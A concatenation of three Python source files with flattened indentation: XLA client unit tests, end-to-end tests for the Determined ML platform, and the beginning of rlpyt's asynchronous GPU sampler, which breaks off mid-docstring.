self._ExecuteAndCompareClose(c, expected=10)
def testReduce2DTo1DDim0F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim0F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim1F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce2DTo1DDim1F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce3DAllPossibleWaysF32(self):
input_array = self._MakeSample3DArrayF32()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduce3DAllPossibleWaysF64(self):
input_array = self._MakeSample3DArrayF64()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduceWindowValidUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testReduceWindowValidUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testWhileF32(self):
cond = self._CreateTestF32Lt10Computation()
body = self._CreateMulF32By2Computation()
c = self._NewComputation()
init = c.ConstantF32Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testWhileF64(self):
cond = self._CreateTestF64Lt10Computation()
body = self._CreateMulF64By2Computation()
c = self._NewComputation()
init = c.ConstantF64Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testConditionalTrue(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(True)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=6.)
def testConditionalFalse(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(False)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=1.)
def testInfeedS32Values(self):
to_infeed = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
c.Infeed(xla_client.Shape.from_pyval(to_infeed[0]))
compiled_c = c.Build().CompileWithExampleArguments()
for item in to_infeed:
xla_client.transfer_to_infeed(item)
for item in to_infeed:
result = compiled_c.ExecuteWithPythonValues()
self.assertEqual(result, item)
def testInfeedThenOutfeedS32(self):
to_round_trip = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
x = c.Infeed(xla_client.Shape.from_pyval(to_round_trip[0]))
c.Outfeed(x)
compiled_c = c.Build().CompileWithExampleArguments()
for want in to_round_trip:
execution = threading.Thread(target=compiled_c.Execute)
execution.start()
xla_client.transfer_to_infeed(want)
got = xla_client.transfer_from_outfeed(
xla_client.Shape.from_pyval(to_round_trip[0]))
execution.join()
self.assertEqual(want, got)
class ErrorTest(LocalComputationTest):
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.s32_scalar_2 = NumpyArrayS32(2)
def testInvokeWithWrongElementType(self):
c = self._NewComputation()
c.SetOpMetadata(xla_client.CurrentSourceInfoMetadata())
c.ParameterFromNumpy(self.s32_scalar_2)
c.ClearOpMetadata()
self.assertRaisesRegexp(
RuntimeError, r"Invalid argument shape.*xla_client_test.py.*"
r"expected s32\[\], got f32\[\]",
lambda: c.Build().CompileWithExampleArguments([self.f32_scalar_2]))
class ComputationRootTest(LocalComputationTest):
"""Tests related to setting the root of the computation."""
def testComputationRootDifferentFromLastOp(self):
c = self._NewComputation()
x = c.ParameterFromNumpy(NumpyArrayF32(2.0))
result = c.Add(x, c.ConstantF32Scalar(3.14))
extra = c.Add(result, c.ConstantF32Scalar(1.618)) # pylint: disable=unused-variable
arg = NumpyArrayF32(1.0)
compiled_c = c.Build(result).CompileWithExampleArguments([arg])
ans = compiled_c.ExecuteWithPythonValues([arg])
np.testing.assert_allclose(ans, 4.14)
if __name__ == "__main__":
unittest.main()
|
test_system.py
|
import json
import operator
import os
import subprocess
import tempfile
import threading
import time
from typing import Dict, Set
import botocore.exceptions
import numpy as np
import pytest
import yaml
from determined.common import check, storage
from determined.experimental import Determined, ModelSortBy
from tests import config as conf
from tests import experiment as exp
from tests.fixtures.metric_maker.metric_maker import structure_equal, structure_to_metrics
@pytest.mark.e2e_cpu # type: ignore
def test_trial_error() -> None:
exp.run_failure_test(
conf.fixtures_path("trial_error/const.yaml"),
conf.fixtures_path("trial_error"),
"NotImplementedError",
)
@pytest.mark.e2e_cpu # type: ignore
def test_invalid_experiment() -> None:
completed_process = exp.maybe_create_experiment(
conf.fixtures_path("invalid_experiment/const.yaml"), conf.cv_examples_path("mnist_tf")
)
assert completed_process.returncode != 0
@pytest.mark.e2e_cpu # type: ignore
def test_metric_gathering() -> None:
"""
Confirm that metrics are gathered from the trial the way that we expect.
"""
experiment_id = exp.run_basic_test(
conf.fixtures_path("metric_maker/const.yaml"), conf.fixtures_path("metric_maker"), 1
)
trials = exp.experiment_trials(experiment_id)
assert len(trials) == 1
# Read the structure of the metrics directly from the config file
config = conf.load_config(conf.fixtures_path("metric_maker/const.yaml"))
base_value = config["hyperparameters"]["starting_base_value"]
gain_per_batch = config["hyperparameters"]["gain_per_batch"]
training_structure = config["hyperparameters"]["training_structure"]["val"]
validation_structure = config["hyperparameters"]["validation_structure"]["val"]
scheduling_unit = 100
# Check training metrics.
full_trial_metrics = exp.trial_metrics(trials[0]["id"])
for step in full_trial_metrics["steps"]:
metrics = step["metrics"]
assert metrics["num_inputs"] == scheduling_unit
actual = metrics["batch_metrics"]
assert len(actual) == scheduling_unit
first_base_value = base_value + (step["id"] - 1) * scheduling_unit
batch_values = first_base_value + gain_per_batch * np.arange(scheduling_unit)
expected = [structure_to_metrics(value, training_structure) for value in batch_values]
assert structure_equal(expected, actual)
# Check validation metrics.
for step in trials[0]["steps"]:
validation = step["validation"]
metrics = validation["metrics"]
actual = metrics["validation_metrics"]
value = base_value + step["id"] * scheduling_unit
expected = structure_to_metrics(value, validation_structure)
assert structure_equal(expected, actual)
@pytest.mark.e2e_gpu # type: ignore
def test_gc_checkpoints_s3(secrets: Dict[str, str]) -> None:
config = exp.s3_checkpoint_config(secrets)
run_gc_checkpoints_test(config)
@pytest.mark.e2e_cpu # type: ignore
def test_gc_checkpoints_lfs() -> None:
run_gc_checkpoints_test(exp.shared_fs_checkpoint_config())
def run_gc_checkpoints_test(checkpoint_storage: Dict[str, str]) -> None:
fixtures = [
(
conf.fixtures_path("no_op/gc_checkpoints_decreasing.yaml"),
{"COMPLETED": {800, 900, 1000}, "DELETED": {100, 200, 300, 400, 500, 600, 700}},
),
(
conf.fixtures_path("no_op/gc_checkpoints_increasing.yaml"),
{"COMPLETED": {100, 200, 300, 900, 1000}, "DELETED": {400, 500, 600, 700, 800}},
),
]
all_checkpoints = []
for base_conf_path, result in fixtures:
config = conf.load_config(str(base_conf_path))
config["checkpoint_storage"].update(checkpoint_storage)
with tempfile.NamedTemporaryFile() as tf:
with open(tf.name, "w") as f:
yaml.dump(config, f)
experiment_id = exp.create_experiment(tf.name, conf.fixtures_path("no_op"))
exp.wait_for_experiment_state(experiment_id, "COMPLETED")
# Checkpoints are not marked as deleted until gc_checkpoint task starts.
retries = 5
for retry in range(retries):
trials = exp.experiment_trials(experiment_id)
assert len(trials) == 1
checkpoints = sorted(
(step["checkpoint"] for step in trials[0]["steps"]),
key=operator.itemgetter("total_batches"),
)
assert len(checkpoints) == 10
by_state = {} # type: Dict[str, Set[int]]
for checkpoint in checkpoints:
by_state.setdefault(checkpoint["state"], set()).add(checkpoint["total_batches"])
if by_state == result:
all_checkpoints.append((config, checkpoints))
break
if retry + 1 == retries:
assert by_state == result
time.sleep(1)
# Check that the actual checkpoint storage (for shared_fs) reflects the
# deletions. We want to wait for the GC containers to exit, so check
# repeatedly with a timeout.
max_checks = 30
for i in range(max_checks):
time.sleep(1)
try:
for config, checkpoints in all_checkpoints:
checkpoint_config = config["checkpoint_storage"]
if checkpoint_config["type"] == "shared_fs":
deleted_exception = check.CheckFailedError
elif checkpoint_config["type"] == "s3":
deleted_exception = botocore.exceptions.ClientError
else:
raise NotImplementedError(
f'unsupported storage type {checkpoint_config["type"]}'
)
storage_manager = storage.build(checkpoint_config, container_path=None)
for checkpoint in checkpoints:
metadata = storage.StorageMetadata.from_json(checkpoint)
if checkpoint["state"] == "COMPLETED":
with storage_manager.restore_path(metadata):
pass
elif checkpoint["state"] == "DELETED":
try:
with storage_manager.restore_path(metadata):
raise AssertionError("checkpoint not deleted")
except deleted_exception:
pass
except AssertionError:
if i == max_checks - 1:
raise
else:
break
@pytest.mark.e2e_cpu # type: ignore
def test_experiment_archive_unarchive() -> None:
experiment_id = exp.create_experiment(
conf.fixtures_path("no_op/single.yaml"), conf.fixtures_path("no_op"), ["--paused"]
)
describe_args = [
"det",
"-m",
conf.make_master_url(),
"experiment",
"describe",
"--json",
str(experiment_id),
]
# Check that the experiment is initially unarchived.
infos = json.loads(subprocess.check_output(describe_args))
assert len(infos) == 1
assert not infos[0]["archived"]
# Check that archiving a non-terminal experiment fails, then terminate it.
with pytest.raises(subprocess.CalledProcessError):
subprocess.check_call(
["det", "-m", conf.make_master_url(), "experiment", "archive", str(experiment_id)]
)
subprocess.check_call(
["det", "-m", conf.make_master_url(), "experiment", "cancel", str(experiment_id)]
)
# Check that we can archive and unarchive the experiment and see the expected effects.
subprocess.check_call(
["det", "-m", conf.make_master_url(), "experiment", "archive", str(experiment_id)]
)
infos = json.loads(subprocess.check_output(describe_args))
assert len(infos) == 1
assert infos[0]["archived"]
subprocess.check_call(
["det", "-m", conf.make_master_url(), "experiment", "unarchive", str(experiment_id)]
)
infos = json.loads(subprocess.check_output(describe_args))
assert len(infos) == 1
assert not infos[0]["archived"]
@pytest.mark.e2e_cpu # type: ignore
def test_create_test_mode() -> None:
# test-mode should succeed with a valid experiment.
command = [
"det",
"-m",
conf.make_master_url(),
"experiment",
"create",
"--test-mode",
conf.fixtures_path("mnist_pytorch/adaptive_short.yaml"),
conf.tutorials_path("mnist_pytorch"),
]
output = subprocess.check_output(command, universal_newlines=True)
assert "Model definition test succeeded" in output
# test-mode should fail when an error is introduced into the trial
# implementation.
command = [
"det",
"-m",
conf.make_master_url(),
"experiment",
"create",
"--test-mode",
conf.fixtures_path("trial_error/const.yaml"),
conf.fixtures_path("trial_error"),
]
with pytest.raises(subprocess.CalledProcessError):
subprocess.check_call(command)
@pytest.mark.e2e_cpu # type: ignore
def test_trial_logs() -> None:
experiment_id = exp.run_basic_test(
conf.fixtures_path("no_op/single.yaml"), conf.fixtures_path("no_op"), 1
)
trial_id = exp.experiment_trials(experiment_id)[0]["id"]
subprocess.check_call(["det", "-m", conf.make_master_url(), "trial", "logs", str(trial_id)])
subprocess.check_call(
["det", "-m", conf.make_master_url(), "trial", "logs", "--head", "10", str(trial_id)],
)
subprocess.check_call(
["det", "-m", conf.make_master_url(), "trial", "logs", "--tail", "10", str(trial_id)],
)
@pytest.mark.e2e_cpu # type: ignore
def test_labels() -> None:
experiment_id = exp.create_experiment(
conf.fixtures_path("no_op/single-one-short-step.yaml"), conf.fixtures_path("no_op"), None
)
label = "__det_test_dummy_label__"
# Add a label and check that it shows up.
subprocess.check_call(
["det", "-m", conf.make_master_url(), "e", "label", "add", str(experiment_id), label]
)
output = subprocess.check_output(
["det", "-m", conf.make_master_url(), "e", "describe", str(experiment_id)]
).decode()
assert label in output
# Remove the label and check that it doesn't show up.
subprocess.check_call(
["det", "-m", conf.make_master_url(), "e", "label", "remove", str(experiment_id), label]
)
output = subprocess.check_output(
["det", "-m", conf.make_master_url(), "e", "describe", str(experiment_id)]
).decode()
assert label not in output
@pytest.mark.e2e_cpu # type: ignore
def test_end_to_end_adaptive() -> None:
exp_id = exp.run_basic_test(
conf.fixtures_path("mnist_pytorch/adaptive_short.yaml"),
conf.tutorials_path("mnist_pytorch"),
None,
)
# Check that validation accuracy look sane (more than 93% on MNIST).
trials = exp.experiment_trials(exp_id)
best = None
for trial in trials:
assert len(trial["steps"])
last_step = trial["steps"][-1]
accuracy = last_step["validation"]["metrics"]["validation_metrics"]["accuracy"]
if not best or accuracy > best:
best = accuracy
assert best is not None
assert best > 0.93
# Check that ExperimentReference returns a sorted order of top checkpoints
# without gaps. The top 2 checkpoints should be the first 2 of the top k
# checkpoints if sorting is stable.
d = Determined(conf.make_master_url())
exp_ref = d.get_experiment(exp_id)
top_2 = exp_ref.top_n_checkpoints(2)
top_k = exp_ref.top_n_checkpoints(
len(trials), sort_by="validation_loss", smaller_is_better=True
)
top_2_uuids = [c.uuid for c in top_2]
top_k_uuids = [c.uuid for c in top_k]
assert top_2_uuids == top_k_uuids[:2]
# Check that metrics are truly in sorted order.
metrics = [c.validation["metrics"]["validationMetrics"]["validation_loss"] for c in top_k]
assert metrics == sorted(metrics)
# Check that changing smaller is better reverses the checkpoint ordering.
top_k_reversed = exp_ref.top_n_checkpoints(
len(trials), sort_by="validation_loss", smaller_is_better=False
)
top_k_reversed_uuids = [c.uuid for c in top_k_reversed]
assert top_k_uuids == top_k_reversed_uuids[::-1]
checkpoint = top_k[0]
checkpoint.add_metadata({"testing": "metadata"})
db_check = d.get_checkpoint(checkpoint.uuid)
# Make sure the checkpoint metadata is correct and correctly saved to the db.
assert checkpoint.metadata == {"testing": "metadata"}
assert checkpoint.metadata == db_check.metadata
checkpoint.add_metadata({"some_key": "some_value"})
db_check = d.get_checkpoint(checkpoint.uuid)
assert checkpoint.metadata == {"testing": "metadata", "some_key": "some_value"}
assert checkpoint.metadata == db_check.metadata
checkpoint.add_metadata({"testing": "override"})
db_check = d.get_checkpoint(checkpoint.uuid)
assert checkpoint.metadata == {"testing": "override", "some_key": "some_value"}
assert checkpoint.metadata == db_check.metadata
checkpoint.remove_metadata(["some_key"])
db_check = d.get_checkpoint(checkpoint.uuid)
assert checkpoint.metadata == {"testing": "override"}
assert checkpoint.metadata == db_check.metadata
@pytest.mark.e2e_cpu # type: ignore
def test_model_registry() -> None:
exp_id = exp.run_basic_test(
conf.fixtures_path("mnist_pytorch/const-pytorch11.yaml"),
conf.tutorials_path("mnist_pytorch"),
None,
)
d = Determined(conf.make_master_url())
# Create a model and validate twiddling the metadata.
mnist = d.create_model("mnist", "simple computer vision model")
assert mnist.metadata == {}
mnist.add_metadata({"testing": "metadata"})
db_model = d.get_model("mnist")
# Make sure the model metadata is correct and correctly saved to the db.
assert mnist.metadata == db_model.metadata
assert mnist.metadata == {"testing": "metadata"}
mnist.add_metadata({"some_key": "some_value"})
db_model = d.get_model("mnist")
assert mnist.metadata == db_model.metadata
assert mnist.metadata == {"testing": "metadata", "some_key": "some_value"}
mnist.add_metadata({"testing": "override"})
db_model = d.get_model("mnist")
assert mnist.metadata == db_model.metadata
assert mnist.metadata == {"testing": "override", "some_key": "some_value"}
mnist.remove_metadata(["some_key"])
db_model = d.get_model("mnist")
assert mnist.metadata == db_model.metadata
assert mnist.metadata == {"testing": "override"}
# Register a version for the model and validate the latest.
checkpoint = d.get_experiment(exp_id).top_checkpoint()
model_version = mnist.register_version(checkpoint.uuid)
assert model_version.model_version == 1
latest_version = mnist.get_version()
assert latest_version is not None
assert latest_version.uuid == checkpoint.uuid
# Run another basic test and register its checkpoint as a version as well.
# Validate the latest has been updated.
exp_id = exp.run_basic_test(
conf.fixtures_path("mnist_pytorch/const-pytorch11.yaml"),
conf.tutorials_path("mnist_pytorch"),
None,
)
checkpoint = d.get_experiment(exp_id).top_checkpoint()
model_version = mnist.register_version(checkpoint.uuid)
assert model_version.model_version == 2
latest_version = mnist.get_version()
assert latest_version is not None
assert latest_version.uuid == checkpoint.uuid
# Ensure the correct number of versions are present.
all_versions = mnist.get_versions()
assert len(all_versions) == 2
# Create some more models and validate listing models.
d.create_model("transformer", "all you need is attention")
d.create_model("object-detection", "a bounding box model")
models = d.get_models(sort_by=ModelSortBy.NAME)
assert [m.name for m in models] == ["mnist", "object-detection", "transformer"]
@pytest.mark.e2e_cpu # type: ignore
def test_log_null_bytes() -> None:
config_obj = conf.load_config(conf.fixtures_path("no_op/single.yaml"))
config_obj["hyperparameters"]["write_null"] = True
config_obj["max_restarts"] = 0
config_obj["searcher"]["max_length"] = {"batches": 1}
experiment_id = exp.run_basic_test_with_temp_config(config_obj, conf.fixtures_path("no_op"), 1)
trials = exp.experiment_trials(experiment_id)
assert len(trials) == 1
logs = exp.trial_logs(trials[0]["id"])
assert len(logs) > 0
@pytest.mark.e2e_cpu # type: ignore
def test_graceful_trial_termination() -> None:
config_obj = conf.load_config(conf.fixtures_path("no_op/grid-graceful-trial-termination.yaml"))
exp.run_basic_test_with_temp_config(config_obj, conf.fixtures_path("no_op"), 2)
@pytest.mark.e2e_gpu # type: ignore
def test_s3_no_creds(secrets: Dict[str, str]) -> None:
pytest.skip("Temporarily skipping this until we find a more secure way of testing this.")
config = conf.load_config(conf.tutorials_path("mnist_pytorch/const.yaml"))
config["checkpoint_storage"] = exp.s3_checkpoint_config_no_creds()
config.setdefault("environment", {})
config["environment"].setdefault("environment_variables", [])
config["environment"]["environment_variables"] += [
f"AWS_ACCESS_KEY_ID={secrets['INTEGRATIONS_S3_ACCESS_KEY']}",
f"AWS_SECRET_ACCESS_KEY={secrets['INTEGRATIONS_S3_SECRET_KEY']}",
]
exp.run_basic_test_with_temp_config(config, conf.tutorials_path("mnist_pytorch"), 1)
@pytest.mark.parallel # type: ignore
def test_pytorch_parallel() -> None:
config = conf.load_config(conf.tutorials_path("mnist_pytorch/const.yaml"))
config = conf.set_slots_per_trial(config, 8)
config = conf.set_max_length(config, {"batches": 200})
config = conf.set_tensor_auto_tuning(config, True)
config = conf.set_perform_initial_validation(config, True)
exp_id = exp.run_basic_test_with_temp_config(
config, conf.tutorials_path("mnist_pytorch"), 1, has_zeroth_step=True
)
exp.assert_performed_initial_validation(exp_id)
@pytest.mark.e2e_cpu # type: ignore
def test_fail_on_first_validation() -> None:
error_log = "failed on first validation"
config_obj = conf.load_config(conf.fixtures_path("no_op/single.yaml"))
config_obj["hyperparameters"]["fail_on_first_validation"] = error_log
exp.run_failure_test_with_temp_config(
config_obj,
conf.fixtures_path("no_op"),
error_log,
)
@pytest.mark.e2e_cpu # type: ignore
def test_fail_on_chechpoint_save() -> None:
error_log = "failed on checkpoint save"
config_obj = conf.load_config(conf.fixtures_path("no_op/single.yaml"))
config_obj["hyperparameters"]["fail_on_chechpoint_save"] = error_log
exp.run_failure_test_with_temp_config(
config_obj,
conf.fixtures_path("no_op"),
error_log,
)
@pytest.mark.e2e_cpu # type: ignore
def test_fail_on_preclose_chechpoint_save() -> None:
error_log = "failed on checkpoint save"
config_obj = conf.load_config(conf.fixtures_path("no_op/single.yaml"))
config_obj["hyperparameters"]["fail_on_chechpoint_save"] = error_log
config_obj["searcher"]["max_length"] = {"batches": 1}
config_obj["min_validation_period"] = {"batches": 1}
config_obj["max_restarts"] = 1
exp.run_failure_test_with_temp_config(
config_obj,
conf.fixtures_path("no_op"),
error_log,
)
@pytest.mark.e2e_cpu # type: ignore
def test_perform_initial_validation() -> None:
config = conf.load_config(conf.fixtures_path("no_op/single.yaml"))
config = conf.set_max_length(config, {"batches": 1})
config = conf.set_perform_initial_validation(config, True)
exp_id = exp.run_basic_test_with_temp_config(
config, conf.fixtures_path("no_op"), 1, has_zeroth_step=True
)
exp.assert_performed_initial_validation(exp_id)
@pytest.mark.parallel # type: ignore
def test_distributed_logging() -> None:
config = conf.load_config(conf.fixtures_path("pytorch_no_op/const.yaml"))
config = conf.set_slots_per_trial(config, 8)
config = conf.set_max_length(config, {"batches": 1})
e_id = exp.run_basic_test_with_temp_config(config, conf.fixtures_path("pytorch_no_op"), 1)
t_id = exp.experiment_trials(e_id)[0]["id"]
for i in range(config["resources"]["slots_per_trial"]):
assert exp.check_if_string_present_in_trial_logs(
t_id, "finished train_batch for rank {}".format(i)
)
@pytest.mark.e2e_cpu # type: ignore
def test_disable_and_enable_slots() -> None:
command = [
"det",
"-m",
conf.make_master_url(),
"slot",
"list",
"--json",
]
output = subprocess.check_output(command).decode()
slots = json.loads(output)
assert len(slots) == 1
command = [
"det",
"-m",
conf.make_master_url(),
"slot",
"disable",
slots[0]["agent_id"],
slots[0]["slot_id"],
]
subprocess.check_call(command)
command = [
"det",
"-m",
conf.make_master_url(),
"slot",
"enable",
slots[0]["agent_id"],
slots[0]["slot_id"],
]
subprocess.check_call(command)
@pytest.mark.parallel # type: ignore
@pytest.mark.timeout(300) # type: ignore
def test_gang_scheduling() -> None:
total_slots = os.getenv("TOTAL_SLOTS")
if total_slots is None:
pytest.skip("test requires a static cluster and TOTAL_SLOTS set in the environment")
config = conf.load_config(conf.tutorials_path("mnist_pytorch/distributed.yaml"))
config = conf.set_slots_per_trial(config, int(total_slots))
model = conf.tutorials_path("mnist_pytorch")
def submit_job() -> None:
ret_value = exp.run_basic_test_with_temp_config(config, model, 1)
print(ret_value)
t = []
for _i in range(2):
t.append(threading.Thread(target=submit_job))
for i in range(2):
t[i].start()
for i in range(2):
t[i].join()
|
gpu_sampler.py
|
import ctypes
import multiprocessing as mp
import psutil
import torch
from rlpyt.agents.base import AgentInputs
from rlpyt.samplers.async_.action_server import AsyncActionServer
from rlpyt.samplers.async_.base import AsyncParallelSamplerMixin
from rlpyt.samplers.async_.collectors import DbGpuResetCollector
from rlpyt.samplers.parallel.base import ParallelSamplerBase
from rlpyt.samplers.parallel.gpu.collectors import GpuEvalCollector
from rlpyt.samplers.parallel.gpu.sampler import GpuSamplerBase, build_step_buffer
from rlpyt.samplers.parallel.worker import sampling_process
from rlpyt.utils.collections import AttrDict
from rlpyt.utils.logging import logger
from rlpyt.utils.seed import make_seed
class AsyncGpuSamplerBase(AsyncParallelSamplerMixin, ParallelSamplerBase):
"""Main definitions for asynchronous parallel sampler using GPU(s) for
action selection. The main sampler process (forked from the overall
master), forks action-server processes, one per GPU to be used, and
the action-server process(es) fork their own parallel CPU workers.
This same sampler object is used in the main sampler process and in
the action server process(es), but for different methods, labeled by
comments in the code (easier way to pass arguments along).
"""
def __init__(
self,
*args,
CollectorCls=DbGpuResetCollector,
eval_CollectorCls=GpuEvalCollector,
**kwargs,
):
super().__init__(
*args,
CollectorCls=CollectorCls,
eval_CollectorCls=eval_CollectorCls,
**kwargs,
)
##########################################
# In forked sampler runner process.
##########################################
def initialize(self, affinity):
"""Initialization inside the main sampler process. Builds one level
of parallel synchronization objects, and forks action-server processes,
one per GPU to be used.
"""
torch.set_num_threads(1) # Needed to avoid MKL hang :( .
self.world_size = n_server = len(affinity)
n_envs_lists = self._get_n_envs_lists(affinity)
n_server = len(n_envs_lists)
n_worker = sum([len(n_envs_list) for n_envs_list in n_envs_lists])
self.n_worker = n_worker
if self.eval_n_envs > 0:
self.eval_n_envs_per = max(1, self.eval_n_envs // n_worker)
self.eval_n_envs = eval_n_envs = self.eval_n_envs_per * n_worker
logger.log(f"Total parallel evaluation envs: {eval_n_envs}.")
self.eval_max_T = eval_max_T = int(self.eval_max_steps // eval_n_envs)
self._build_parallel_ctrl(n_server, n_worker)
servers_kwargs = self._assemble_servers_kwargs(
affinity, self.seed, n_envs_lists
)
servers = [
mp.Process(target=self.action_server_process, kwargs=s_kwargs)
for s_kwargs in servers_kwargs
]
for s in servers:
s.start()
self.servers = servers
self.ctrl.barrier_out.wait() # Wait for workers to decorrelate envs.
# obtain_samples() and evaluate_agent() remain the same.
def shutdown(self):
self.ctrl.quit.value = True
self.ctrl.barrier_in.wait()
for s in self.servers:
s.join()
def _get_n_envs_lists(self, affinity):
B = self.batch_spec.B
n_server = len(affinity)
n_workers = [len(aff["workers_cpus"]) for aff in affinity]
if B < n_server:
raise ValueError(
f"Request fewer envs ({B}) than action servers " f"({n_server})."
)
server_Bs = [B // n_server] * n_server
if n_workers.count(n_workers[0]) != len(n_workers):
logger.log(
"WARNING: affinity requested different number of "
"environment workers per action server, but environments "
"will be assigned equally across action servers anyway."
)
if B % n_server > 0:
for s in range(B % n_server):
server_Bs[s] += 1 # Spread across action servers.
n_envs_lists = list()
for s_worker, s_B in zip(n_workers, server_Bs):
n_envs_lists.append(self._get_n_envs_list(n_worker=s_worker, B=s_B))
return n_envs_lists
def _build_parallel_ctrl(self, n_server, n_worker):
super()._build_parallel_ctrl(n_worker + n_server)
def _assemble_servers_kwargs(self, affinity, seed, n_envs_lists):
servers_kwargs = list()
i_env = 0
i_worker = 0
for rank in range(len(affinity)):
n_worker = len(affinity[rank]["workers_cpus"])
n_env = sum(n_envs_lists[rank])
slice_B = slice(i_env, i_env + n_env)
server_kwargs = dict(
rank=rank,
env_ranks=list(range(i_env, i_env + n_env)),
double_buffer_slice=tuple(
buf[:, slice_B] for buf in self.double_buffer
),
affinity=affinity[rank],
n_envs_list=n_envs_lists[rank],
seed=seed + i_worker,
)
servers_kwargs.append(server_kwargs)
i_worker += n_worker
i_env += n_env
return servers_kwargs
############################################
# In action server processes (forked again).
############################################
def action_server_process(
self, rank, env_ranks, double_buffer_slice, affinity, seed, n_envs_list
):
"""Target method used for forking action-server process(es) from the
main sampler process. By inheriting the sampler object from the
sampler process, can more easily pass args to the environment worker
processes, which are forked from here.
